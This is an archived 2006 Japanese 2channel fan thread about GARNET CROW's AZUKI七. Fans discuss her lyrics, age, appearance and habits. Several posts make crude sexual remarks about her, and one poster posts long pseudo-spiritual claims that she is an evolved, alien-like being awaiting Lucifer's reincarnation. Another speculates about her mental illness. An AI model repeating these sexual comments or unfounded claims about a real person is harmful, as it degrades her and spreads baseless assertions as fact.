小豆はMでゆりっぺはドSっぽい。
つかライブで沖縄に旅行に行った話しはしてないのか?
一番のネタだと思うが

144 :通行人さん@無名タレント:2006/12/08(金) 23:28:46 ID:zdnnI9BJ
>>138
色々考える時間が増えたね。
時の流れとか、死後の世界とかそんなのを考えるようになった。
哲学とか宗教に関する本も幾つか読んでみた。
ナナーの言葉に対する自分なりの解釈を探るためかな?
でも今はそれだけではなくなりつつあるような気もする。
彼女の存在は深遠だ…
俺を色々と悩まさせてくれるよ、七様はw

それと、一人でぶらぶらと巡るようになった。
一人で山に行くのも中々良い
ダイビングもいつかやりたいけど、資格いるし。
時間がなぁ

145 :通行人さん@無名タレント:2006/12/08(金) 23:48:08 ID:XqLS91Iz
自分もいろいろ考えるようになったかな。思想かな?いろんなことに興味持ったりする。視野が広がった。
青い花読んだことある??七さんどんな本読んでるんだろ?

146 :通行人さん@無名タレント:2006/12/09(土) 11:27:56 ID:H6jfWRtw
七に興味をもって視野が広がるのは勝手だけど、
感性は生まれ持ったもので、磨くことはできないから
憧れる程度にしといたら?
ちなみに七さんの詞は彼女が就寝寸前になるときに行われます。

147 :通行人さん@無名タレント:2006/12/09(土) 11:37:41 ID:erhYQeS4
確かに七の域まで行くのは、かなり難しいだろうな
でも感性を磨けないってのは賛同しかねる
生まれ持った物は少しはあるだろうけど、
やはり環境が大きく左右するのでは?
生まれたときは誰もが無垢で無知で、そこから作り上げていくのだと思う

148 :通行人さん@無名タレント:2006/12/09(土) 11:57:30 ID:H6jfWRtw
私が言いたいのは要するに大人になってから
感性を磨くってのは無理だってこと

149 :通行人さん@無名タレント:2006/12/09(土) 12:02:33 ID:eIyBN6RB
そうだそうだ。やっぱり七さんはすごい!

150 :通行人さん@無名タレント:2006/12/09(土) 18:42:56 ID:Jt7XJYyB
普通に手コキされたい。

151 :通行人さん@無名タレント:2006/12/09(土) 20:11:03 ID:U18sEh4T
集約するとつまり抱きたい

152 :通行人さん@無名タレント:2006/12/09(土) 22:36:00 ID:Jt7XJYyB
>>151
縁がないから、俺はどうでもいいや。

手コキされてる想像して、オナるよ。

153 :通行人さん@無名タレント:2006/12/09(土) 23:07:45 ID:eIyBN6RB
七さんみたいな彼女は理想的ですか?

154 :通行人さん@無名タレント:2006/12/09(土) 23:47:24 ID:+PTYU4Mh
>153
勘違いしてほしくないのは、七様の魅力は精神性にある。
だから、精神が一般人並になれば魅力はなくなる。

顔だけで七様をみているわけではないから、そのへんを理解してね。


155 :通行人さん@無名タレント:2006/12/09(土) 23:50:06 ID:+PTYU4Mh
俺が七様に対して、どのような基準で魅力を感じているかというと、

顔30% スタイル20% 精神性50%

だから、精神性が一般人並になれば魅力が半減し、おそらく興味が
なくなる。



156 :通行人さん@無名タレント:2006/12/09(土) 23:54:38 ID:Jt7XJYyB
俺は、スタイル25、顔50、精神面25だな。

157 :通行人さん@無名タレント:2006/12/10(日) 00:09:25 ID:/wEiMGVF
精神面は50ですか。やっぱすごい!!

158 :通行人さん@無名タレント:2006/12/10(日) 00:44:16 ID:kcJ6qD3i
何が凄いんだアホか

159 :通行人さん@無名タレント:2006/12/10(日) 11:24:50 ID:q3ggMuBv
俺が七様に対して、どのような基準で魅力を感じているかというと、

顔30% スタイル20% 精神性50%

だから、精神性が一般人並になれば魅力が半減し、おそらく興味が
なくなる。


160 :通行人さん@無名タレント:2006/12/10(日) 11:36:29 ID:/wEiMGVF
http://c-au.2ch.net/test/-/mjsaloon/1165068090/464-

161 :AZUKI七氏:2006/12/10(日) 15:51:58 ID:3x4RFdW8
ヒマワリヒマワリもっと咲いて〜

162 :通行人さん@無名タレント:2006/12/10(日) 17:30:16 ID:/wEiMGVF
向日葵いい曲だよね。

163 :通行人さん@無名タレント:2006/12/10(日) 18:03:21 ID:W1SN/i9g
http://mogemoge.jp/hane2/

164 :通行人さん@無名タレント:2006/12/10(日) 22:52:10 ID:ZnT3fh1+
らげってどこ行った?もういないかな?
嫌な奴だったけど知識豊富だったなぁ

165 :迦雄須(カオス):2006/12/11(月) 00:59:37 ID:+dhP6/7B
私は、GIZA系のアーティストが好きである。
三枝夕夏、ハレンチ☆パンチ・・・GARNET CROW。
ガネクロのことを調べるうちに、このスレに導かれてきた。
これも錫杖(しゃくじょう)の導きであろうか・・・

ところで、AZUKI氏(うじ)の実物を見た主(ぬし)はおるか?
さぞかし美しかったであろうな?
見た目はユーコリンやザアドに似ておるな・・・
私もエデンの園で、つけ入るように愛を打ち明けてみたいものだ・・・

166 :通行人さん@無名タレント:2006/12/11(月) 12:35:53 ID:5ncZgeSl
演奏しながらおっとりとした七様の顔には萌えた。

167 :迦雄須(カオス):2006/12/11(月) 14:17:11 ID:+dhP6/7B
それは例のフルートの演奏か、それともキーボードの演奏か?
AZUKI氏(うじ)は、本当に30代なのか?
とてもそんなには見えないぞ!

錫杖(しゃくじょう)よ、AZUKI氏の詩は難解だのう・・・

168 :通行人さん@無名タレント:2006/12/11(月) 15:43:04 ID:rN0Id/6K
メチャクチャ既出だが
1989年に「ディープキッチュ」1993〜1994深夜放送
に三つ編み、ランドセルで出演してたのが20歳
現在、33歳。久しぶりにビデオ見直した。
おっとりしたしゃべり、笑った時の顔、最高です。
今も魅力は全然かわりません。

一般人の「年齢の概念」は七様には、あてはまらないのだ!!
彼女こそ超越者だ!!!!


169 :通行人さん@無名タレント:2006/12/11(月) 19:18:50 ID:ziGORGWW
うpしていただけませんでしょうか?

170 :通行人さん@無名タレント:2006/12/11(月) 19:42:01 ID:5ncZgeSl
GARNET CROW七周年七様の年七様の2007年、七様の想いが多くの人々に届きますように。
逢いたい七様逢いたいよ〜

171 :迦雄須(カオス):2006/12/11(月) 19:59:45 ID:+dhP6/7B
>>168
ありがとう。
そして、私からもうPをお願いしたい。
錫杖よ、導いてくれ!

172 :通行人さん@無名タレント:2006/12/11(月) 22:11:59 ID:sxXw1aiE
七様の世界を、おいらが現実に実現するぜ。

霊的世界観を有している七様の理想を、おいらが実現する。

エロスを克服したおいらと、論理を克服した七様が協力すれば、

それは可能だ。

だだ、おいらの文章を読んだ者が何を言っているのかは理解できない

とおもうが、精神世界の根幹的なことを述べてみた。

男が克服するのは、女のエロスに対する抗体を作り克服することで、

女が克服するのは、苦手な論理(ロゴス)を克服することなんだ。

七様はロゴスを克服しているから、求める男はまちがいなくエロスを

克服した男ということになる。

ようは、七様は次世代に進化した生命体を生む準備が整った人なんだ。




173 :通行人さん@無名タレント:2006/12/11(月) 22:18:56 ID:sxXw1aiE
七様が独身を宣言したのは、なぜかというとエロスを克服した男は
この世にいないだろうという前提に立っているのではないかと思う。

あと、七様は恋愛が豊富だとよく聞く話だが、実際そうである可能性は高い。
女のほとんどが恋愛に関しては、マイナスにならない場合が多いが、
男はほとんど、マイナスになる場合が多いのだ。

男はエロスを克服することが、宿命的に定められている為である。
それを無視して若い時に男が、恋愛を豊富にこなした場合は、
30過ぎあたりからキモ親父に急激に変わっていくことになる。

そして、20代中にエロスを克服した男は逆で30過ぎから渋いカッコイイ
男に変わっていくのである。




174 :通行人さん@無名タレント:2006/12/11(月) 22:28:40 ID:sxXw1aiE
七様は、ここをチェックしていると聞いているから、
おいらは精神世界の秘儀をここで述べることにしている。

七様が精神世界に来た場合、かなり高い地位を与えられることは
間違いが無い。

彼女がアーティストとして成功したのは、ロゴスの克服と精神境地の高さ
であることはほぼ間違いないと思っている。

このような女性は、日本では1000万人に一人くらいの割合でしか、
今の時代ではいないと思われる。

ただ100年後、世界があったとすれば、その比率は飛躍的に増えているが
今の時代では相当稀であるため、本人の精神的きつさは相当である。









175 :通行人さん@無名タレント:2006/12/11(月) 22:30:39 ID:oMNjTeIP
エドザクみたいw

176 :通行人さん@無名タレント:2006/12/11(月) 22:39:51 ID:sxXw1aiE
おいらはエドザクではないが、学問系のとこで生きている。
七様の詩を読んで、えらく哲学や死を意識しているなと思ってな。

ついでに七様は美しすぎるが、エロス系の女ではない為、有害には
感じない。

とにかく、七様にプライベートで関わるレベルに達するには、
相当な課題をクリアしなければならないわけで、彼女のレベルに
達しないといけないわけだ。

七様に対する遠人愛で、自分がより成長する為の標榜となるわけである。
もし、近人愛に妥協し、エロスを克服することなく時間を過ごせば、
同等な女で我慢しなければならなくなるだろう。

そんな女を手に入れても嫉妬されることはないから、楽といえば楽だが、
楽には成長はない。



177 :通行人さん@無名タレント:2006/12/11(月) 23:05:17 ID:e81nX/cY
>>168 確かにその通りだ。
世界で唯一、年齢の概念が当てはまらない女性だ。
ビデオ持ってるなら、お金を出しても見てみたい。

>>169 >>171 超既出だがほらよ

ttp://yas.ro/azuki-and-yoiko.wmv




178 :通行人さん@無名タレント:2006/12/11(月) 23:16:40 ID:ziGORGWW
散々既出だがサンクス。
しかしなかなか高度な話をしてるな
俺は見てるだけにしとくよ

179 :通行人さん@無名タレント:2006/12/11(月) 23:35:01 ID:q76i+ogK
会って話したことがあるわけでもないのに七様の何が分かるってんだ?
詩の内容から彼女の性格や人間性を推察するのは結構だが、
七様の好みや癖を知っているわけではあるまい?

180 :通行人さん@無名タレント:2006/12/12(火) 00:35:41 ID:uLYuGSD+
とりあえず、
カレンダーの2月と10〜11月の写真は
間違いなく有史以来最も美しい。

181 :通行人さん@無名タレント:2006/12/12(火) 01:04:46 ID:/rjk+g+D
>>174
>七様は、ここをチェックしていると聞いているから、

誰から聞いたの?w

182 :通行人さん@無名タレント:2006/12/12(火) 15:03:00 ID:/uwItLzV
>>179
このスレ全部妄想だって前提の上にあるんじゃないの?

183 :前スレ主:2006/12/12(火) 15:32:30 ID:nYBzstlj
七さま見てる〜

俺と結婚して

184 :ジモン:2006/12/12(火) 20:01:33 ID:AQPdMnlE
いやいや、俺がケコーンするよ。

185 :迦雄須(カオス):2006/12/12(火) 20:18:55 ID:/tnQwPNa
私も名乗りを挙げるとしよう。
私には、錫杖(しゃくじょう)の御加護がある!
きっと導いてくれよう・・・

186 :前スレの主:2006/12/12(火) 21:27:57 ID:nYBzstlj
き、きさまら・・・。

邪魔する気だな。
ぷんぷん(`・ω・´)

187 :迦雄須(カオス):2006/12/12(火) 21:38:55 ID:/tnQwPNa
これが男の性(さが)というものだ!
錫杖は何でも見通しておる・・・

188 :通行人さん@無名タレント:2006/12/13(水) 00:21:21 ID:jy9120g1
七様を相手できるのは、神以上でないと無理。

人間レベルに留まっている者、乙。



189 :通行人さん@無名タレント:2006/12/13(水) 00:25:00 ID:jy9120g1
人間ばなれした容姿、精神、知能と有していない七様に相手されることはない。

なぜそんなことをいうかというと、七様がそれだからだ。

金の力で七様を手に入れようとしても無理だろう、それは七様は経済的に成功して

いるからである。普通の女なら金で買えるが、七様を買うという発想では

絶対に無理である。



190 :通行人さん@無名タレント:2006/12/13(水) 00:41:04 ID:whc0F0bz
金で買おうとする奴には七以前に良い女はこないだろー

191 :前スレの主:2006/12/13(水) 01:10:34 ID:hbk2PJMr
金では愛情は買えないが、生活は買える。

七は生活のために愛を捨てた。

192 :通行人さん@無名タレント:2006/12/14(木) 00:39:36 ID:2N1Rwvv1
キモイw

193 :通行人さん@無名タレント:2006/12/14(木) 16:49:58 ID:WVCfLf7+
七様と結婚できる可能性がある男性の5つの条件

「芸術家肌」「文学好き」「痩せ型」「生活にこだわらない」「AB型」



194 :通行人さん@無名タレント:2006/12/14(木) 17:42:01 ID:NRcaC7ER
>七様と結婚できる可能性がある男性の5つの条件

>「芸術家肌」「文学好き」「痩せ型」「生活にこだわらない」「AB型」

+ 「宇宙人並の進化していること」
+ 「運命的に定められている人」

運命で定められている者という条件が入っている以上、
現世的な発想ではもはや理解不能だし、これは当人同士の
ことなので誰にもわからないことになる。

33歳で美人でしかもストイックな性格で独身を貫いていること事態が
摩訶不思議なんだよな。

こういう人だから、運命的に定められている人を推測すると、
渋い二枚目でストイックで運命で定められている人以外にうけつけない
ような人でないと無理なような気がするな。

七様と同質であることが稀であるから、相当なレアな男ということに
なるな。

道端で女捜しているような男では無理ということになる。





195 :通行人さん@無名タレント:2006/12/14(木) 17:50:33 ID:NRcaC7ER
七様は地球レベルの人間ではなく、他星の進化した生命体と同等くらい
かそれより若干下回る程度の進化を果している。

七様と同等の進化程度を果たしていないとパートナーとしては不可能。
もし、普通の男が七様の夫になった場合は、七様が人間で夫は猿という
くらいの関係になってしまう。ようはペットくらいにしかみてもらえない。

男だって、猿並の女に魅力を感じることはないだろう。七様も同じことを
感じているのだ。

あと進化と学歴は関係がないことはないが、あまり関係が無い。
ようは論理学を本当の意味で習得しているかが重要であって、
良い大学出ていても、本当の意味で習得していなければ、
猿と変わらない。





196 :通行人さん@無名タレント:2006/12/14(木) 18:00:44 ID:NRcaC7ER
七様と一緒になる運命のあるものは、渋くて二枚目で宇宙人並に進化を
果していて、独身を決意している者ということになる。

これは今の七様を男バージョンにしただけだ。
このような美しい男女が一緒になることは、非常に喜ばしいことである。

運命で定められた者以外は、パートナーに選ばないという賢明さと
真剣さが二人をめぐり合わせることになるのだ。

だから、七様にふさわしい高貴な男が与えられることになる。
この男は女から見たら、おそろしく価値ある存在であるが、
それは七様も同じであるから、別に構わないだろう。



197 :通行人さん@無名タレント:2006/12/14(木) 18:44:16 ID:L2uxDLCA
>>194-196
七様は宇宙人まで読んだ

198 :通行人さん@無名タレント:2006/12/14(木) 22:24:34 ID:2N1Rwvv1
七さまの友達って

199 :通行人さん@無名タレント:2006/12/14(木) 22:38:26 ID:oTdXcgAj
物凄くキモイ

200 :通行人さん@無名タレント:2006/12/15(金) 00:41:27 ID:SrmTZlYK
七様は…

201 :通行人さん@無名タレント:2006/12/15(金) 00:58:49 ID:fwv1ylhe
七様が見てる

202 :通行人さん@無名タレント:2006/12/15(金) 02:05:56 ID:yllHWDU2
七の乳首黒そうだな

203 :通行人さん@無名タレント:2006/12/15(金) 19:31:11 ID:VcStJ882
七様今日もお疲れ様。

死にたいくらい好きだー!!

204 :通行人さん@無名タレント:2006/12/15(金) 20:41:43 ID:f0cS6GPE
俺は七様に見切りをつける。
お前達との七様争奪戦に疲れたw
だからといって、七様がお前達を相手にすることは
ないだろうが、それでも見切りをつける。
競争が激しい相手をGETするのも大変だが、
その後のケアも大変だろうと思うからだ。

俺は面倒なことはしない主義だから、やはり独身貴族を
貫くことにする。ただ七様みたいな高貴な女性は日本では
稀であるから、心の片隅で七様の幻想は残しておこうと思うw

まあ、俺はストイックに自分の道を究めていく。
そして、お前達の七様への愛が届くことを祈っているぜ。




205 :通行人さん@無名タレント:2006/12/15(金) 21:12:30 ID:1hiZ/C+J
半分ほど同意。
マジでゲットしようなんて思ってる奴いねーだろw
ナナーには女性としても惹かれるが、何よりも生き方や思想に惹かれる。
両方の要素を兼ね備えた理想郷は心の片隅だけでいい。

206 :通行人さん@無名タレント:2006/12/16(土) 12:24:33 ID:ByM3qhZS
あくまで理想でいい。憧れぐらいにしか思ってないです。あんな30代になりたい。

207 :通行人さん@無名タレント:2006/12/16(土) 20:42:31 ID:TrSd2IgJ
あくまで理想?
本気でゲット?












ただ、抱きたい。

208 :通行人さん@無名タレント:2006/12/17(日) 00:30:21 ID:V2kGbaOB
ってか女ですし。憧れぐらいにしか思いませんよ。

209 :通行人さん@無名タレント:2006/12/17(日) 01:12:29 ID:pW3qZzNE
ここは七さまに祈りを捧げるスレである

210 :通行人さん@無名タレント:2006/12/17(日) 09:14:48 ID:DKYxsgOM
七様のピアノ音遠くから聞こえてきて
人々は懲りもせずに祈る
日が落ちるその前にただ祈る


211 :通行人さん@無名タレント:2006/12/17(日) 17:06:37 ID:V2kGbaOB
空色のネコたん

212 :通行人さん@無名タレント:2006/12/17(日) 17:24:31 ID:V2kGbaOB
七様ファンでファンサイトしてる人いる?

213 :空色の猫ひろし?:2006/12/17(日) 20:26:19 ID:DKYxsgOM
ニャ〜m(=^皿^=)m

214 :通行人さん@無名タレント:2006/12/17(日) 23:37:00 ID:MxucsUNr
例えばこの地球上のどこかで奇跡的にAZUKI七と出会い話す機会があっても
自分が彼女のファンであることを告げてはいけない
GARNET CROWのことさえよく知らないふりをした方がよい
そうすればお互い知らない者同士対等な立場で接することができる
AZUKI七も素の自分でいられるので楽なはず
もし楽しい印象が残せたなら一般人レベルで知り合い程度の間柄にはなれるかもしれない

ただし諸君、果たしてそんな幸運に恵まれたとして平静を装おっていられるだろうか
否、まともに目を合わすことさえできはしない

つまりファンになってしまった以上 AZUKI七と親しくなれる可能性は無くなっちゃったよ\(^O^)/


215 :通行人さん@無名タレント:2006/12/18(月) 00:11:24 ID:hptr+8d8

久しぶりに天才を見た!!

216 :通行人さん@無名タレント:2006/12/18(月) 01:14:51 ID:kOL8r0sW
天才アゲ☆☆

217 :通行人さん@無名タレント:2006/12/18(月) 12:37:18 ID:Wnurmkao
七ってほんとにかわいいよな
二十代の頃を知りたいから詩集探してこよっと

218 :通行人さん@無名タレント:2006/12/18(月) 21:22:18 ID:SZXerzMs
七様はルシファーの生まれ変わりを捜し求めている。


219 :通行人さん@無名タレント:2006/12/18(月) 21:27:04 ID:SZXerzMs
七様が世に出ることによって、ルシファーの生まれ変わりが、
七様に気がついて接近することになるだろう。

ただ、その目的は霊的世界の構築の為であり、男女関係を成就する
ことではないだろう。七様もそのへんは自覚していることだろうと
思われる。




220 :通行人さん@無名タレント:2006/12/18(月) 21:33:50 ID:SZXerzMs
ルシファーの生まれ変わりは、この世で追い込まれて生きているだろう。
それでも彼はそれに耐えて、生き延びている。ある目的の為に耐えて生きている。
そろそろ彼が目覚めるが、彼を支える軍団が必要になる。
彼とその軍団は、この日本を変えることになるだろう。


221 :通行人さん@無名タレント:2006/12/18(月) 21:37:51 ID:SZXerzMs
ルシファーの生まれ変わりは、自分の使命を自覚し始めている。
その使命だけに生きることを許され、自分の幸福とされる事柄は、
すべて投げ捨てている。もちろん愛する女も捨てて生きている。
そんな彼を支える女が七様ということになるのだろう。

おそらく七様はそんな男の理想を描いている。


222 :通行人さん@無名タレント:2006/12/19(火) 00:15:09 ID:d+DC8FrL
作り話とはいえすげえwwwwwwwwwwwwww
馬鹿みてえだwwwwwwwwwwwwwwwwww

223 :通行人さん@無名タレント:2006/12/19(火) 02:37:54 ID:e/HjvCne
ボケがナナーで、ツッコミがゆりっぺの漫才がみたい

224 :通行人さん@無名タレント:2006/12/19(火) 19:40:54 ID:zHeYztNU
( ^ω^)お?

225 :通行人さん@無名タレント:2006/12/19(火) 20:14:38 ID:D3bFHifX
あげ

226 :通行人さん@無名タレント:2006/12/20(水) 01:08:41 ID:utCO9RY3
にゃにゃげんきでちゅか?

227 :通行人さん@無名タレント:2006/12/20(水) 02:48:02 ID:X1/9+AEf
( ^ω^)元気だお

228 :通行人さん@無名タレント:2006/12/20(水) 10:19:33 ID:qYvLZImS
七、元気〜?

229 :通行人さん@無名タレント:2006/12/20(水) 23:50:06 ID:BQBTNxZ2
holding you and swingingとA crownが聴けた。
もう、死んでもいい。

230 :通行人さん@無名タレント:2006/12/21(木) 01:56:24 ID:xXJ/t0Le
七様を拝むスレw来年はラッキーセブンなんだってw

231 :通行人さん@無名タレント:2006/12/21(木) 18:15:14 ID:UtQXPTGY
( ^ω^)来年は七の年だお

232 :通行人さん@無名タレント:2006/12/21(木) 18:35:39 ID:4IOo+GlO
七が喋ると、アンガの山根に見えてしまう・・・

233 :通行人さん@無名タレント:2006/12/21(木) 22:49:22 ID:HbQzOLZx
七は栗毛のPVのときが一番きれいだったな
それ以降は 魂抜かれたような顔になってる

234 :通行人さん@無名タレント:2006/12/22(金) 00:22:36 ID:cIdL40ca
逃れの町の歌詞すごい凹む…キリスト教…

235 :通行人さん@無名タレント:2006/12/22(金) 01:43:34 ID:kMOodCcR
七様が精神が病んでしまっていても、俺は必ず守る。
病気が快癒するまで守り続ける。哲学者や文学者は精神の
深いところで戦っている為、精神の病に侵されてしまうことが
多いのだ。

この病は時間でしか解決しない、酒や薬で楽になろうとしても無駄で、
時間でしか解決しない。だから、理解者がそばでその病気の快癒を
見守る必要がある。

ただ、七様の深い闇を理解できる者は同質の者以外は無理であるから、
自ずと孤独の道を選んでしまう。

七様はただ一人の理解者をそばに置いておく必要がある。
気軽に会話できる友人を持つことによって、快癒に向かって
行くことになるだろう。





236 :通行人さん@無名タレント:2006/12/22(金) 07:10:08 ID:DQfLv80w
( ^ω^)難しいお

237 :通行人さん@無名タレント:2006/12/22(金) 14:10:55 ID:cIdL40ca
(-ω-)前から思ってたけど難しいこと言ってる人は同一人物でつか?

238 :通行人さん@無名タレント:2006/12/22(金) 17:43:54 ID:X3PQ951B
七さんはどんなクリスマスを過ごすのかなあ

239 :通行人さん@無名タレント:2006/12/22(金) 19:57:23 ID:3zX68s8d
>>238
自転車で転ぶ・・・・とかじゃない

240 :通行人さん@無名タレント:2006/12/22(金) 23:15:11 ID:H7ymjecp
意外とドジっ子というか抜けてるとこがかわいいw
壁に頭ぶつけて気絶とか、マイナスイオンドライヤーとか


241 :通行人さん@無名タレント:2006/12/22(金) 23:26:59 ID:DQfLv80w
⊂二二二( ^ω^)二⊃ビュワッチ

242 :通行人さん@無名タレント:2006/12/23(土) 00:23:50 ID:pi/bQrD+
七さん彼氏いるのかな?

243 :通行人さん@無名タレント:2006/12/23(土) 00:37:38 ID:WKQ/vtEH
>>242
ゆりっぺ

244 :通行人さん@無名タレント:2006/12/23(土) 01:42:22 ID:pi/bQrD+
ゆりっぺは女の子じゃんw七さんは女から見てもかっこいい

245 :通行人さん@無名タレント:2006/12/23(土) 09:06:01 ID:+1pryKe4
七さんてなんか裕木奈江に似てない?

246 :通行人さん@無名タレント:2006/12/23(土) 10:15:09 ID:DzR0q1QO
俺は七様が、歳を取ろうが愛し続ける。

そして、七様の心を傷を癒せるのは俺しかいない。




247 :通行人さん@無名タレント:2006/12/23(土) 12:45:45 ID:1TpvLAr/
クリスマス、なんて関係ない。








七様をただ抱きたい。

248 :通行人さん@無名タレント:2006/12/23(土) 15:01:31 ID:pi/bQrD+
でたw愛の告白w
七様が素敵に年を越せますように。

249 :通行人さん@無名タレント:2006/12/23(土) 19:56:29 ID:1TpvLAr/
七様と好きな人が百年続きますように…

250 :通行人さん@無名タレント:2006/12/23(土) 22:08:29 ID:+HNbfUjz
一青窈乙。七スレなのに・・

251 :通行人さん@無名タレント:2006/12/23(土) 22:53:50 ID:HpRcvlTL
 この方は勉強家かつ、宗教の事なども勉強されている方なので頭は勿論良いが、心もとても綺麗なので






ダメだ、糞な俺にはこの先の言葉がうまく表現出来ない。。

252 :通行人さん@無名タレント:2006/12/24(日) 00:47:42 ID:fGONVlze
逃れの町にハマってる、かなりいい。七様すげ。七様はクリスマス嫌い?

253 :通行人さん@無名タレント:2006/12/24(日) 01:08:31 ID:lC2b5rG7
俺はクリスマスにはしゃぐような軽薄な奴が嫌いだ。


254 :通行人さん@無名タレント:2006/12/24(日) 01:21:26 ID:vyUdo40j
>252
確か嫌いだったと思う。
MFMのコラムで昔そんなこと書いてた。
年末年始も嫌いで、好きなのは節分。

けどその割には自分でツリーになる木を
切りに行こうとしてたんだよな。

七、君が分からないよorz

255 :通行人さん@無名タレント:2006/12/24(日) 01:51:30 ID:TIA7kYMX
決めた!俺も今日からクリトマス嫌いになる

256 :通行人さん@無名タレント:2006/12/24(日) 01:53:24 ID:fGONVlze
昔から嫌い。年末年始は大嫌い。鬱だよ…

257 :通行人さん@無名タレント:2006/12/24(日) 06:19:10 ID:8cqWLCT1
今日はDVDを見てゆっくり過ごすかな

クリスマスに出かけるほど愚かな事はない

258 :通行人さん@無名タレント:2006/12/24(日) 16:48:05 ID:9ZlzDHUo
めっちゃハキハキしゃべっております☆

259 :通行人さん@無名タレント:2006/12/24(日) 21:41:52 ID:fGONVlze
古井さんカコイイ!!

260 :通行人さん@無名タレント:2006/12/25(月) 00:40:06 ID:y9tqL26e
七様とゆりっぺはもう三十代?

261 :通行人さん@無名タレント:2006/12/25(月) 01:14:34 ID:LsrB7Whd
七様と同じ時代に生まれたことを感謝します。
ラーメン(-人-)

262 :通行人さん@無名タレント:2006/12/25(月) 11:59:25 ID:md8+H4dN
携帯からスマソ

七様って髪の毛染めたことあるのかな?



263 :通行人さん@無名タレント:2006/12/25(月) 19:12:51 ID:BdFUMjVx
>>262

赤のヘア・マニュキアの写真は見たことあるよ。

264 :通行人さん@無名タレント:2006/12/25(月) 20:03:13 ID:nTsBM/9A
ロング・ショートどっちがデフォ?

265 :通行人さん@無名タレント:2006/12/25(月) 20:11:33 ID:UiAfsD1q
>264
餅が言うにはロング。

266 :通行人さん@無名タレント:2006/12/25(月) 21:56:59 ID:nTsBM/9A
じゃショートはヅラか thx

267 :通行人さん@無名タレント:2006/12/26(火) 00:45:09 ID:RH5GJ0wD
髪のびるスピードハンパじゃない七様ww

268 :通行人さん@無名タレント:2006/12/26(火) 08:13:40 ID:kFj22OVU
⊂二二二( ^ω^)二⊃びゅーんだお

269 :通行人さん@無名タレント:2006/12/26(火) 12:05:57 ID:p9DWqSON
七様ビロ〜ン

270 :通行人さん@無名タレント:2006/12/26(火) 12:25:40 ID:RH5GJ0wD
o(^ω^)oかわゆすw前のブーンと同じ人?

271 :通行人さん@無名タレント:2006/12/26(火) 18:09:35 ID:6yFOvgP+
ss

272 :通行人さん@無名タレント:2006/12/27(水) 14:47:27 ID:5hzAKDcC
ナナー

273 :通行人さん@無名タレント:2006/12/27(水) 15:45:02 ID:rSQz/ONm
七様は細木数子の著書の6世占星術の結果、土星マイナスであった。

一言で真面目な性格だ。そして、婚期の逃しやすい星であるみたいだ。。。




274 :通行人さん@無名タレント:2006/12/27(水) 20:40:31 ID:hU8qmqvX
ゆりっぺは水星人でしょ。しかも動物占いは黒ひょう。
スレチだけど凄いよく分かるw

275 :通行人さん@無名タレント:2006/12/29(金) 09:08:32 ID:aFogt8br
( ^ω^)おもろいお

276 :通行人さん@無名タレント:2006/12/29(金) 15:19:47 ID:mruBZErt
過疎っているがw
それでも俺は七様を彼女か嫁してみせるぞ!

えーと。。。来年三十四歳か。。。。。
もう、子供生めないかも知れん。。。。

それでも構わないということは、俺の七様への思いが
正しいということになるな。

とにかく、俺は七様を得る闘争に入るから、ライバル達との激闘を期待
しているぜw 頭脳、肉体、容姿、人格、経済力(近年この価値は
変わるかもしれんが。。)の総合力で勝負だ。

楽しみにしているぞw

277 :通行人さん@無名タレント:2006/12/30(土) 00:03:50 ID:hkbty/XZ
夢みんなよカス

278 :通行人さん@無名タレント:2006/12/30(土) 01:08:42 ID:5nfya981
ユメヲミタアトデ 君はまだ遠くて

279 :通行人さん@無名タレント:2006/12/30(土) 03:34:49 ID:0vlgHmtf
夢を見ることによって、それを目標に努力を積んでいく。
そんなこともわからんのかカス。

58 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)